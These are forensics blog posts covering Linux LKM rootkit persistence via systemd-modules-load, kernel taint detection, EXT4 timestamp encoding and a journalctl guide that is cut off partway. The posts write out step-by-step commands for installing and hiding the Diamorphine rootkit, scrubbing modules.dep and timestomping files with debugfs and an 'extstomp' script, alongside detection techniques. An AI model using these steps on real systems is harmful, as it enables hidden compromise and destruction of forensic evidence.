A Little More on LKM Persistence

In my previous blog post I demonstrated a method for persisting a Linux LKM rootkit across reboots by leveraging systemd-modules-load. For this method to work, we needed to add the evil module into the /usr/lib/modules/$(uname -r) directory and then run depmod. As I pointed out in the article, while the LKM could hide the module object itself, the modprobe command invoked by systemd-modules-load requires the module name to be listed in the modules.dep and modules.dep.bin files created by depmod.

But a few days later it occurred to me that the module name actually only has to appear in the modules.dep.bin file in order to be loaded. modules.dep is an intermediate file that modules.dep.bin is built from. The modprobe command invoked by systemd-modules-load only looks at the (trie structured) modules.dep.bin file. So once modules.dep.bin is created, the attacker could go back and remove their evil module name from modules.dep.

I tested this on my lab system, installing the LKM per my previous blog post and then editing the evil module name out of modules.dep. When I rebooted my lab system, I verfied that the evil module was loaded by looking for the files that are hidden by the rootkit:

# ls /usr/lib/modules-load.d/
fwupd-msr.conf open-vm-tools-desktop.conf
# ls /usr/lib/modules/$(uname -r)/kernel/drivers/block
aoe drbd loop.ko nbd.ko pktcdvd.ko rsxx sx8.ko virtio_blk.ko xen-blkfront.ko
brd.ko floppy.ko mtip32xx null_blk.ko rbd.ko skd.ko umem.ko xen-blkback zram

If the rootkit was not operating, we’d see the zaq123edcx* file in each of these directories.

I thought about writing some code to unpack the format of modules.dep.bin. This format is well documented in the comments of the source code for depmod.c. But then I realized that there was a much easier way to find the evil module name hiding in modules.dep.bin.

depmod works by walking the directory structure under /usr/lib/modules/$(uname -r) and creating modules.dep based on what it finds there. If we run depmod while the LKM is active, then depmod will not see the evil kernel object and will build a new modules.dep and modules.dep.bin file without the LKM object listed:

# cd /usr/lib/modules/$(uname -r)
# cp modules.dep modules.dep.orig
# cp modules.dep.bin modules.dep.bin.orig
# depmod
# diff modules.dep modules.dep.orig
# diff modules.dep.bin modules.dep.bin.orig
Binary files modules.dep.bin and modules.dep.bin.orig differ

The old and new modules.dep files are the same, since I had previously removed the evil module name by hand. But the *.bin* files differ because the evil module name is still lurking in modules.dep.bin.orig.

And I don’t need to write code to dump the contents of modules.dep.bin.orig— I’ll just use strings and diff:

# diff <(strings -a modules.dep.bin.orig) <(strings -a modules.dep.bin)
1c1
< ?=4_cs
---
> 4_cs
5610,5611d5609
< 123edcx_diamorphine
< <kernel/drivers/block/zaq123edcx-diamorphine.ko:
5616c5614
< 4ndemod
---
> demod
5619c5617
< enhua
---
> 5jenhua
5622a5621
> 7@53
5627d5625
< 8Z2c
5630c5628
< a2326
---
> 9Ja2326
5635c5633
< alloc
---
> <valloc

The output would be prettier with some custom tooling, but you can clearly see the name of the hidden object in the diff output.

From an investigative perspective, I really wish depmod had an option to write modules.dep.bin to an alternate directory. That would make it easier to perform these steps without modifying the state of the system under investigation. I suppose we could use overlayfs hacks to make this happen.

But honestly using modprobe to load your LKM rootkit is probably not the best approach. insmod allows you to specify the path to your evil module. Create a script that uses insmod to load the rootkit, and then drop the script into /etc/cron.hourly with a file name that will be hidden once the rootkit is loaded. Easy!

Linux LKM Persistence

Back in August, Ruben Groenewoud posted two detailed articles on Linux persistence mechanisms and then followed that up with a testing/simulation tool called PANIX that implements many of these persistence mechanisms. Ruben’s work was, in turn, influenced by a series of articles by Pepe Berba and work by Eder Ignacio. Eder’s February article on persistence with udev rules seems particularly prescient after Stroz/AON reported in August on a long-running campaign using udev rules for persistence. I highly recommend all of this work, and frankly I’m including these links so I personally have an easy place to go find them whenever I need them.

In general, all of this work focuses on using persistence mechanisms for running programs in user space. For example, PANIX sets up a simple reverse shell by default (though the actual payload can be customized) and the “sedexp” campaign described by Stroz/AON used udev rules to trigger a custom malware executable.

Reading all of this material got my evil mind working, and got me thinking about how I might handle persistence if I was working with a Linux loadable kernel module (LKM) type rootkit. Certainly I could use any of the user space persistence mechanisms in PANIX that run with root privilege (or at least have CAP_SYS_MODULE capability) to call modprobe or insmod to load my evil kernel module. But what about other Linux mechanisms for specifically loading kernel modules at boot time?

Hiks Gerganov has written a useful article summarizing how to load Linux modules at boot time. If you want to be traditional, you can always put the name of the module you want to load into /etc/modules. But that seems a little too obvious, so instead we are going to use the more flexible systemd-modules-load service to get our evil kernel module installed.

systemd-modules-load looks in multiple directories for configuration files specifying modules to load, including /etc/modules-load.d, /usr/lib/modules-load.d, and /usr/local/lib/modules-load.d. systemd-modules-load also looks in /run/modules-load.d, but /run is typically a tmpfs style file system that does not persist across reboots. Configuration file names must end with “.conf” and simply contain the names of the modules to load, one name per line.

For my examples, I’m going to use the Diamorphine LKM rootkit. Diamorphine started out as a proof of concept rootkit, but a Diamorphine variant has recently been found in the wild. Diamorphine allows you to choose a “magic string” at compile time– any file or directory name that starts with the magic string will automatically be hidden by the rootkit once the rootkit is loaded into the kernel. In my examples I am using the magic string “zaq123edcx“.

First we need to copy the Diamorphine kernel module, typically compiled as diamorphine.ko, into a directory under /usr/lib/modules where it can be found by the modprobe command invoked by systemd-modules-load:

# cp diamorphine.ko /usr/lib/modules/$(uname -r)/kernel/drivers/block/zaq123edcx-diamorphine.ko
# depmod

Note that the directory under /usr/lib/modules is kernel version specific. You can put your evil module anywhere under /usr/lib/modules/*/kernel that you like. Notice that by using the magic string in the file name, we are relying on the rootkit itself to hide the module. Of course, if the victim machine receives a kernel update then your Diamorphine module in the older kernel directory will no longer be loaded and your evil plots could end up being exposed.

The depmod step is necessary to update the /usr/lib/modules/*/modules.dep and /usr/lib/modules/*/modules.dep.bin files. Until these files are updated, modprobe will be unable to locate your kernel module. Unfortunately, depmod puts the path name of your evil module into both of the modules.dep* files. So you will probably want to choose a less obvious name (and magic string) than the one I am using here.

The only other step needed is to create a configuration file for systemd-modules-load:

# echo zaq123edcx-diamorphine >/usr/lib/modules-load.d/zaq123edcx-evil.conf

The configuration file is just a single line– whatever name you copied the evil module to under /usr/lib/modules, but without the “.ko” extension. Here again we name the configuration file with the Diamorphine magic string so the file will be hidden once the rootkit is loaded.

That’s all the configuration you need to do. Load the rootkit manually by running “modprobe zaq123edcx-diamorphine” and rest easy in the knowledge that the rootkit will load automatically whenever the system reboots.

Finding the Evil

What artifacts are created by these changes? The mtime on the /usr/lib/modules-load.d directory and the directory where you installed the rootkit module will be updated. Aside from putting the name of your evil module into the modules.dep* files, the depmod command updates the mtime on several other files under /usr/lib/modules/*:

/usr/lib/modules/.../modules.alias
/usr/lib/modules/.../modules.alias.bin
/usr/lib/modules/.../modules.builtin.alias.bin
/usr/lib/modules/.../modules.builtin.bin
/usr/lib/modules/.../modules.dep
/usr/lib/modules/.../modules.dep.bin
/usr/lib/modules/.../modules.devname
/usr/lib/modules/.../modules.softdep
/usr/lib/modules/.../modules.symbols
/usr/lib/modules/.../modules.symbols.bin

Timestomping these files and directories could make things more difficult for hunters.

But loading the rootkit is also likely to “taint” the kernel. You can try looking at the dmesg output for taint warnings:

# dmesg | grep taint
[ 8.390098] diamorphine: loading out-of-tree module taints kernel.
[ 8.390112] diamorphine: module verification failed: signature and/or required key missing - tainting kernel

However, these log messages can be removed by the attacker or simply disappear due to the system’s normal log rotation (if the machine has been running long enough). So you should also look at /proc/sys/kernel/tainted:

# cat /proc/sys/kernel/tainted
12288

Any non-zero value means that the kernel is tainted. To interpret the value, here is a trick based on an idea in the kernel.org document I referenced above:

# taintval=$(cat /proc/sys/kernel/tainted)
# for i in {0..18}; do [[ $(($taintval>>$i & 1)) -eq 1 ]] && echo $i; done
12
13

Referring to the kernel.org document, bit 12 being set means an “out of tree” (externally built) module was loaded. Bit 13 means the module was unsigned. Notice that these flags correspond to the log messages found in the dmesg output above.

While this is a useful bit of command-line kung fu, I thought it might be useful to have in a more portable format and with more verbose output. So I present to you chktaint.sh:

$ chktaint.sh
externally-built (“out-of-tree”) module was loaded
unsigned module was loaded

By default chktaint.sh reads the value from /proc/sys/kernel/tainted on the live system. But in many cases you may be looking at captured evidence offline. So chktaint.sh also allows you to specify an alternate file path (“chktaint.sh /path/to/evidence/file“) or simply a raw numeric value from /proc/sys/kernel/tainted (“chktaint.sh 12288“).

The persistence mechanism(s) deployed by the attacker are often the best way to detect whether or not a system is compromised. If the attacker is using an LKM rootkit, checking /proc/sys/kernel/tainted is often a good first step in determining if you have a problem. This can be combined with tools like chkproc (find hidden processes) and chkdirs (find hidden directories) from the chkrootkit project.

More on EXT4 Timestamps and Timestomping

Many years ago I did a breakdown of the EXT4 file system. I devoted an entire blog article to the new timestamp system used by EXT4. The trick is that EXT4 added 32-bit nanosecond resolution fractional seconds fields in its extended inode. But you only need 30 bits to represent nanoseconds, so EXT4 uses the lower two bits of the fractional seconds fields to extend the standard Unix “epoch time” timestamps. This allows EXT4 to get past the Y2K-like problem that normal 32-bit epoch timestamps face in the year 2038.

At the time I wrote, “With the extra two bits, the largest value that can be represented is 0x03FFFFFFFF, which is 17179869183 decimal. This yields a GMT date of 2514-05-30 01:53:03…” But it turns out that I misunderstood something critical about the way EXT4 handles timestamps. The actual largest date that can be represented in an EXT4 file system is 2446-05-10 22:38:55. Curious about why? Read on for a breakdown of how EXT4 timestamps are encoded, or skip ahead to “Practical Applications” to understand why this knowledge is useful.

Traditional Unix File System Timestamps

Traditionally, file system times in Unix/Linux are represented as “the number of seconds since 00:00:00 Jan 1, 1970 UTC”– typically referred to as Unix epoch time. But what if you wanted to represent times before 1970? You just use negative seconds to go backwards.

So Unix file system times are represented as signed 32-bit integers. This gives you a time range from 1901-12-13 20:45:52 (-2**31 or 0x80000000 or -2147483648 seconds) to 2038-01-19 03:14:07 (2**31 - 1 or 0x7fffffff or 2147483647 seconds). When January 19th, 2038 rolls around, unpatched 32-bit Unix and Linux systems are going to be having a very bad day. Don’t try to tell me there won’t be critical applications running on these systems in 2038– I’m pretty much basing my retirement planning on consulting in this area.

What Did EXT4 Do?

EXT4 had those two extra bits from the fractional seconds fields to play around with, so the developers used them to extend the seconds portion of the timestamp. When I wrote my infamous “timestamps good into year 2514” comment in the original article, I was thinking of the timestamp as an unsigned 34-bit integer 0x03ffffffff. But that’s not right.

EXT4 still has to support the original timestamp range from 1901 – 2038 and the epoch still has to be based around the January 1, 1970 or else chaos will ensue. So the meaning of the original epoch time values hasn’t changed. This field still counts seconds from -2147483648 to 2147483647.

So what about the extra two bits? With two bits you can enumerate values from 0-3. EXT4 treats these as multiples of 2*32 or 4294967296 seconds. So, for example, if the “extra” bits value was 2 you would start with 2 * 4294967296 = 8589934592 seconds and then add whatever value is in the standard epoch seconds field. And if that epoch seconds value was negative, you end up adding a negative number, which is how mathematicians think of subtraction.

This insanity allows EXT4 to cover a range from (0 * 4294967296 - 2147483648) aka -2147483648 seconds (the traditional 1901 time value) all the way up to (3 * 4294967296 + 2147483647) = 15032385535 seconds. That timestamp is 2446-05-10 22:38:55, the maximum EXT4 timestamp. If you’re still around in the year 2446 (and people are still using money) then maybe you can pick up some extra consulting dollars fixing legacy systems.

At this point you may be wondering why the developers chose this encoding. Why not just use the extra bits to make a 34-bit signed integer? A 34-bit signed integer would have a range from -2**33 = -8589934592 seconds to 2**33 - 1 = 8589934591 seconds. That would give you a range of timestamps from 1697-10-17 11:03:28 to 2242-03-16 12:56:31. Being able to set file timestamps back to 1697 is useful to pretty much nobody. Whereas the system the EXT4 developers chose gives another 200 years of future dates over the basic signed 34-bit date scheme.

Practical Applications

Why I am looking so closely at EXT4 timestamps? This whole business started out because I was frustrated after reading yet another person claiming (incorrectly) that you cannot set ctime and btime in Linux file systems. Yes, the touch command only lets you set atime and mtime, but touch is not the only game in town.

For EXT file systems, the debugfs command allows writing to inode fields directly with the set_inode_field command (abbreviated sif). This works even on actively mounted file systems:

root@LAB:~# touch MYFILE
root@LAB:~# ls -i MYFILE
654442 MYFILE
root@LAB:~# df -h .
Filesystem              Size  Used Avail Use% Mounted on
/dev/mapper/LabVM-root   28G   17G  9.7G  63% /
root@LAB:~# debugfs -w -R 'stat <654442>' /dev/mapper/LabVM-root | grep time:
 ctime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 atime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 mtime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
crtime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
root@LAB:~# debugfs -w -R 'sif <654442> crtime @-86400' /dev/mapper/LabVM-root
root@LAB:~# debugfs -w -R 'stat <654442>' /dev/mapper/LabVM-root | grep time:
 ctime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 atime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 mtime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
crtime: 0xfffeae80:8eb89330 -- Tue Dec 30 19:00:00 1969

The set_inode_field command needs the inode number, the name of the field you want to set (you can get a list of field names with set_inode_field -l), and the value you want to set the field to. In the example above, I’m setting the crtime field (which is how debugfs refers to btime). debugfs wants you to provide the value as an epoch time value– either in hex starting with “0x” or in decimal preceded by “@“.

What often trips people up when they try this is caching. Watch what happens when I use the standard Linux stat command to dump the file timestamps:

root@LAB:~# stat MYFILE
  File: MYFILE
  Size: 0               Blocks: 0          IO Block: 4096   regular empty file
Device: fe00h/65024d    Inode: 654442      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-09-02 09:58:13.598615244 -0400
Modify: 2024-09-02 09:58:13.598615244 -0400
Change: 2024-09-02 09:58:13.598615244 -0400
 Birth: 2024-09-02 09:58:13.598615244 -0400

The btime appears to be unchanged! The inode value has changed, but the operating system hasn’t caught up to the new reality yet. Once I force Linux to drop it’s out-of-date cached info, everything looks as it should:

root@LAB:~# echo 3 > /proc/sys/vm/drop_caches
root@LAB:~# stat MYFILE
  File: MYFILE
  Size: 0               Blocks: 0          IO Block: 4096   regular empty file
Device: fe00h/65024d    Inode: 654442      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-09-02 09:58:13.598615244 -0400
Modify: 2024-09-02 09:58:13.598615244 -0400
Change: 2024-09-02 09:58:13.598615244 -0400
 Birth: 1969-12-30 19:00:00.598615244 -0500

If I wanted to set the fractional seconds field, that would be crtime_extra. Remember, however, that the low bits of this field are used to set dates far into the future:

root@LAB:~# debugfs -w -R 'sif <654442> crtime_extra 2' /dev/mapper/LabVM-root
root@LAB:~# debugfs -w -R 'stat <654442>' /dev/mapper/LabVM-root | grep time:
debugfs 1.46.2 (28-Feb-2021)
 ctime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 atime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 mtime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
crtime: 0xfffeae80:00000002 -- Tue Mar 15 08:56:32 2242

For the *_extra fields, debugfs just wants a raw number either in hex or decimal (hex values should still start with “0x“).

Making This Easier

Human beings would like to use readable timestamps rather than epoch time values. The good news is that GNU date can convert a variety of different timestamp formats into epoch time values:

root@LAB:~# date -d '2345-01-01 12:34:56' '+%s'
11833925696

Specify whatever time string you want to convert after the -d option. The %s format means give epoch time output.

Now for the bad news. The value that date outputs must be converted into the peculiar encoding that EXT4 uses. And that’s why I spent so much time fully understanding the EXT4 timestamp format. That understanding leads to some crazy shell math:

# Calculate a random nanoseconds value
# Mask it down to only 30 bits, shift right two bits
nanosec="0x$(head /dev/urandom | tr -d -c 0-9a-f | cut -c1-8)"
nanosec=$(( ($nanosec & 0x3fffffff) << 2) ))

# Get an epoch time value from the date command
# Adjust the time value to a range of all positive values
# Calculate the number for the standard seconds field
# Calculate the bits needed in the *_extra field
epoch_time=$(date -d '2345-01-01 12:34:56' '+%s)
adjusted_time=$(( $epoch_time + 2147483648 ))
time_lowbits=$(( ($adjusted_time % 4294967296) - 2147483648 ))
time_highbits=$(( $adjusted_time / 4294967296 ))

# The *_extra field value combines extra bits with nanoseconds
extra_field=$(( $nanosec + $time_highbits ))

Clearly nobody wants to do this manually every time. You just want to do some timestomping, right? Don’t worry, I’ve written a script to set timestamps in EXT:

root@LAB:~# extstomp -v -macb -T '2123-04-05 1:23:45' MYFILE
===== MYFILE
 ctime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
 atime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
 mtime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
crtime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
root@LAB:~# extstomp -v -cb -T '2345-04-05 2:34:56' MYFILE
===== MYFILE
 ctime: 0xc1d6b290:61966bab -- Thu Apr  5 02:34:56 2345
 atime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
 mtime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
crtime: 0xc1d6b290:61966bab -- Thu Apr  5 02:34:56 2345

Use the -macb options to specify the timestamps you want to set and -T to specify your time string. You can use -e to specify nanoseconds if you want, otherwise the script just generates a random nanoseconds value. The script is usually silent but -v causes the script to output the file timestamps when it’s done. The script even drops the file system caches automatically for you (unless you use -C to keep the old cached info).

And because you often want to blend in with other files in the operating system, I’ve included an option to copy the timestamps from another file:

root@LAB:~# extstomp -v -macb -S /etc/passwd MYFILE
===== MYFILE
 ctime: 0x66b37fc9:9d8e0ba8 -- Wed Aug  7 10:08:09 2024
 atime: 0x66d5c3cb:33dd3b30 -- Mon Sep  2 09:55:23 2024
 mtime: 0x66b37fc9:9d8e0ba8 -- Wed Aug  7 10:08:09 2024
crtime: 0x66b37fc9:9d8e0ba8 -- Wed Aug  7 10:08:09 2024
root@LAB:~# stat /etc/passwd
  File: /etc/passwd
  Size: 2356            Blocks: 8          IO Block: 4096   regular file
Device: fe00h/65024d    Inode: 1368805     Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-09-02 09:55:23.217534156 -0400
Modify: 2024-08-07 10:08:09.660833002 -0400
Change: 2024-08-07 10:08:09.660833002 -0400
 Birth: 2024-08-07 10:08:09.660833002 -0400

You’re welcome!

What About Other File Systems?

It’s particularly easy to do this timestomping on EXT because debugfs allows us to operate on live file systems. In “expert mode” (xfs_db -x), the xfs_db tool has a write command that allows you to set inode fields. Unfortunately, by default xfs_db does not allow writing to mounted file systems. Of course, an enterprising individual could modify the xfs_db source code and bypass these safety checks.

And that’s really the bottom line. Use the debugging tool for whatever file system you are dealing with to set the timestamp values appropriately for that file system. It may be necessary to modify the code to allow operation on live file systems, but tweaking timestamp fields in an inode while the file system is running is generally not too dangerous.

Systemd Journal and journalctl

While I haven’t been happy about Systemd’s continued encroachment into the Linux operating system, I will say that the Systemd journal is generally an upgrade over traditional Syslog. We’ve reached the point where some newer distributions are starting to forgo Syslog and traditional Syslog-style logs altogether. The challenge for DFIR professionals is that the Systemd journals are in a binary format and require a command-line tool, journalctl, for searching and text output.

The main advantage that Systemd journals have over traditional Syslog-style logs is that Systemd journals carry considerably more metadata related to log messages, and this metadata is broken down into multiple searchable fields. A traditional Syslog log message might look like:

Jul 21 11:22:02 LAB sshd[1304]: Accepted password for lab from 192.168.10.1 port 56280 ssh2

The Systemd journal entry for the same message is:

{
        "_EXE" : "/usr/sbin/sshd",
        "_SYSTEMD_CGROUP" : "/system.slice/ssh.service",
        "_SELINUX_CONTEXT" : "unconfined\n",
        "SYSLOG_FACILITY" : "4",
        "_SYSTEMD_UNIT" : "ssh.service",
        "_UID" : "0",
        "SYSLOG_TIMESTAMP" : "Jul 21 07:22:02 ",
        "_CAP_EFFECTIVE" : "1ffffffffff",
        "_TRANSPORT" : "syslog",
        "_SYSTEMD_SLICE" : "system.slice",
        "PRIORITY" : "6",
        "SYSLOG_IDENTIFIER" : "sshd",
        "_PID" : "1304",
        "_HOSTNAME" : "LAB",
        "__REALTIME_TIMESTAMP" : "1721560922218814",
        "_SYSTEMD_INVOCATION_ID" : "70a0b99512864d22a8f8b10752ad6537",
        "SYSLOG_PID" : "1304",
        "__MONOTONIC_TIMESTAMP" : "265429588",
        "_GID" : "0",
        "__CURSOR" : "s=743db8433dcc46ca9b9cecd7a4272061;i=1d6f;b=5c57e83c3abd457c95d0695807667c9e;m=fd22254;t=61dc0233a613e;x=31ff9c313be9c36f",
        "_CMDLINE" : "sshd: lab [priv]",
        "_MACHINE_ID" : "47b59f088dc74eb0b8544be4c3276463",
        "_COMM" : "sshd",
        "_BOOT_ID" : "5c57e83c3abd457c95d0695807667c9e",
        "MESSAGE" : "Accepted password for lab from 192.168.10.1 port 56280 ssh2",
        "_SOURCE_REALTIME_TIMESTAMP" : "1721560922218786"
}

Any of these fields is individually searchable. The journalctl command provides multiple pre-defined output formats, and custom output of specific fields is also supported.

Systemd uses a simple serialized text protocol over HTTP or HTTPS for sending journal entries to remote log collectors. This protocol uses port 19532 by default. The URL of the remote server is normally found in the /etc/systemd/journal-upload.conf file. On the receiver, configuration for handling the incoming messages is defined in /etc/systemd/journal-remote.conf. A “pull” mode for requesting journal entries from remote systems is also supported, using port 19531 by default.

Journal Time Formats

As you can see in the JSON output above, the Systemd journal supports multiple time formats. The primary format is a Unix epoch style UTC time with an extra six digits for microsecond precision. This is the format for the _SOURCE_REALTIME_TIMESTAMP and __REALTIME_TIMESTAMP fields. Archived journal file names (see below) use a hexadecimal form of this UTC time value.

Note that _SOURCE_REALTIME_TIMESTAMP is the time when systemd-journald first received the message on the system where the message was originally generated. If the message was later relayed to another system using the systemd-journal-remote service, __REALTIME_TIMESTAMP will reflect the time the message was received by the remote system. In the journal on the originating system, _SOURCE_REALTIME_TIMESTAMP and __REALTIME_TIMESTAMP are usually the same value.

I have created shell functions for converting both the decimal and hexadecimal representations of this time format into human-readable time strings:

function jtime { usec=$(echo $1 | cut -c11-); date -d @$(echo $1 | cut -c 1-10) "+%F %T.$usec %z"; }
function jhextime { usec=$(echo $((0x$1)) | cut -c11-); date -d @$(echo $((0x$1)) | cut -c 1-10) "+%F %T.$usec %z"; }

Journal entries also contain a __MONOTONIC_TIMESTAMP field. This field represents the number of microseconds since the system booted. This is the same timestamp typically seen in dmesg output.

Journal entries will usually contain a SYSLOG_TIMESTAMP field. This text field is the traditional Syslog-style timestamp format. This time is in the default local time zone for the originating machine.

Journal Files Location and Naming

Systemd journal files are typically found under /var/log/journal/MACHINE_ID. The MACHINE_ID is a random 128-bit value assigned to each system during the first boot. You can find the MACHINE_ID in the file /etc/machine-id file.

Under the /var/log/journal/MACHINE_ID directory, you will typically find multiple files:

root@LAB:~# ls /var/log/journal/47b59f088dc74eb0b8544be4c3276463/
system@00061db4ac78a3a2-03652b1534b78cc1.journal~
system@7166038d7a284f0f9f3c1aa7fab3f251-0000000000000001-0005f3e6144d8b0c.journal
system@7166038d7a284f0f9f3c1aa7fab3f251-0000000000001d59-0005f848158ef146.journal
system@7166038d7a284f0f9f3c1aa7fab3f251-00000000000061be-0005fbf9b35341f9.journal
system.journal
user-1000@00061db4b9047993-8eabd101686c1832.journal~
user-1000@a9d71fa481e0447a88f62416b6815868-0000000000001d7c-0005f8481f464fe7.journal
user-1000@c946abc41d224a5692053aa4e03ae012-00000000000007fe-0005f3e61585d7c2.journal
user-1000@e933964a572642cdb863a8803485cf10-0000000000006411-0005fbf9b50e0a5a.journal
user-1000.journal

The system.journal file is where logs from operating system services are currently being written. The other system@*.journal files are older, archived journal files. The systemd-journald process takes care of rotating the current journal and purging older files based on parameters configured in /etc/systemd/journald.conf.

The naming convention for these archived files is system@fileid-seqnum-time.journal. fileid is a random 128-bit file ID number. seqnum is the sequence number of the first message in the journal file. Sequence numbers are started at one and simply increase monotonically with each new message. time is the hexadecimal form of the standard journal UTC Unix epoch timestamp (see above). This time matches the __REALTIME_TIMESTAMP value of the first message in the journal– the time that message was received on the local system.

File names that end in a tilde– like the system@00061db4ac78a3a2-03652b1534b78cc1.journal~ file– are files that systemd-journald either detected as corrupted or which were ended by an unclean shutdown of the operating system. The first field after the “@” is a hex timestamp value corresponding to when the file was renamed as an archive. This is often when the system reboots, if the operating system crashed. I have been unable to determine how the second hex string is calculated.

In addition to the system*.journal files, the journal directory may also contain one or more user-UID*.journal files. These are user-specific logs where the UID corresponds to each user’s UID value in the third field of /etc/passwd. The naming convention on the user-UID*.journal files is the same as for the system*.journal files.

The journalctl Command

Because the journalctl command has a large number of options for searching, output formats, and more, I have created a quick one-page cheat sheet for the journalctl command. You may want to refer to the cheat sheet as you read through this section.

My preference is to “export SYSTEMD_PAGER=” before operating the journalctl command. Setting this value to null means that long lines in the journalctl output will wrap onto the next line of your terminal rather than creating a situation where you need to scroll the lines to the right to see the full message. If you want to look at the output one screenful at a time, you can simply pipe the output into less or more.

SELECTING FILES

By default the journalctl command operates on the local journal files in /var/log/journal/MACHINE_ID. If you wish to use a different set of files, you can specify an alternate directory with “-D“, e.g. “journalctl -D /path/to/evidence ...“. You can specify an individual file with “--file=” or use multiple “--file” arguments on a single command line. The “--file” option also accepts normal shell wildcards, so you could use “journalctl --file=system@\*” to operate just on archived system journal files in the current working directory. Note the extra backslash (“\“) to prevent the wildcard from being interpreted by the shell.

journalctl --header” provides information about the contents of one or more journal files:

# journalctl --header --file=system@00061db4ac78a3a2-03652b1534b78cc1.journal~
File path: system@00061db4ac78a3a2-03652b1534b78cc1.journal~
File ID: a98f5eb8aff543a8abdee01518dd91f0
Machine ID: 47b59f088dc74eb0b8544be4c3276463
Boot ID: 9ac272cac6c040a7b9ad021ba32c2574
Sequential number ID: 7166038d7a284f0f9f3c1aa7fab3f251
State: OFFLINE
Compatible flags:
Incompatible flags: COMPRESSED-LZ4
Header size: 256
Arena size: 33554176
Data hash table size: 211313
Field hash table size: 333
Rotate suggested: no
Head sequential number: 27899 (6cfb)
Tail sequential number: 54724 (d5c4)
Head realtime timestamp: Sun 2024-07-14 16:18:40 EDT (61d3ad1816828)
Tail realtime timestamp: Sat 2024-07-20 08:55:01 EDT (61dad51f51a90)
Tail monotonic timestamp: 2d 1min 22.016s (284092380c)
Objects: 116042
Entry objects: 26326
Data objects: 64813
Data hash table fill: 30.7%
Field objects: 114
Field hash table fill: 34.2%
Tag objects: 0
Entry array objects: 24787
Deepest field hash chain: 2
Deepest data hash chain: 4
Disk usage: 32.0M

The most useful information here is the first (“Head“) and last (“Tail“) timestamps in the file along with the object counts.

OUTPUT MODES

The default output mode for journalctl is very similar to a typical Syslog-style log:

# journalctl -t sudo -r
-- Journal begins at Sat 2023-02-04 15:59:52 EST, ends at Sun 2024-07-21 13:00:01 EDT. --
Jul 21 07:34:01 LAB sudo[1491]: pam_unix(sudo:session): session opened for user root(uid=0) by lab(uid=1000)
Jul 21 07:34:01 LAB sudo[1491]:      lab : TTY=pts/1 ; PWD=/home/lab ; USER=root ; COMMAND=/bin/bash
Jul 21 07:22:09 LAB sudo[1432]: pam_unix(sudo:session): session opened for user root(uid=0) by lab(uid=1000)
Jul 21 07:22:09 LAB sudo[1432]:      lab : TTY=pts/0 ; PWD=/home/lab ; USER=root ; COMMAND=/bin/bash
-- Boot 93616c3bb5794e0099520b2bf974d1bc --
Jul 21 07:17:11 LAB sudo[1571]: pam_unix(sudo:session): session closed for user root
Jul 21 07:17:11 LAB sudo[1512]: pam_unix(sudo:session): session closed for user root
[...]

Note that here I am using the “-r” flag so that the most recent entries are shown first rather than the normal ordering of oldest to newest as you would normally read them in a log file.

The main differences between the default journalctl output and default Syslog-style output is the “Journal begins at...” header line and the markers that show which boot session the log messages were generated in. Like normal Syslog logs, the timestamps are shown in the default time zone for the machine where you are running the journalctl command.

If you want to hide the initial header, specify “-q” (“quiet“). If you want to force UTC timestamps, the option is “--utc“. You can hide the boot session information by choosing any one of several output modes with “-o“. Here is a single log message formatted with some of the different output choices:

-o short
Jul 21 07:33:36 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2

-o short-full
Sun 2024-07-21 07:33:36 EDT LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2

-o short-iso
2024-07-21T07:33:36-0400 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2

-o short-iso-precise
2024-07-21T07:33:36.610329-0400 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2

My personal preference is “-q --utc -o short-iso“. If you have a particular preferred output style, you might consider making it an alias so you’re not constantly having to retype the options. In my case the command would be “alias journalctl='journalctl -q --utc -o short-iso'“.

The “-o” option also supports several different JSON output formats. If you are looking to consume journalctl output with a script, you probably want “-o json” which formats all fields in each journal entry as a single long line of minified JSON. “-o json-pretty” is a multi-line output mode that I find useful when I’m trying to figure out which fields to construct my queries with. The JSON output at the top of this article was created with “-o json-pretty“.

In JSON output modes, you can output a custom list of fields with the “--output-fields=” option:

# journalctl -o json-pretty --output-fields=_EXE,_PID,MESSAGE
{
        "_EXE" : "/usr/sbin/sshd",
        "__REALTIME_TIMESTAMP" : "1721561616611216",
        "MESSAGE" : "Accepted password for lab from 192.168.10.1 port 56282 ssh2",
        "_BOOT_ID" : "5c57e83c3abd457c95d0695807667c9e",
        "__CURSOR" : "s=743db8433dcc46ca9b9cecd7a4272061;i=1e19;b=5c57e83c3abd457c95d0695807667c9e;m=3935b8a5;t=61dc04c9df790;x=d031b64e57796135",
        "_PID" : "1478",
        "__MONOTONIC_TIMESTAMP" : "959821989"
}
[...]

Notice that the __CURSOR, __REALTIME_TIMESTAMP, __MONOTONIC_TIMESTAMP, and _BOOT_ID fields are always printed even though we did not specifically select them.

-o verbose --output-fields=...” gives only the requested fields plus __CURSOR but does so without the JSON formatting. “-o cat --output-fields=...” gives just the field values with no field names and no extra fields.

MATCHING MESSAGES

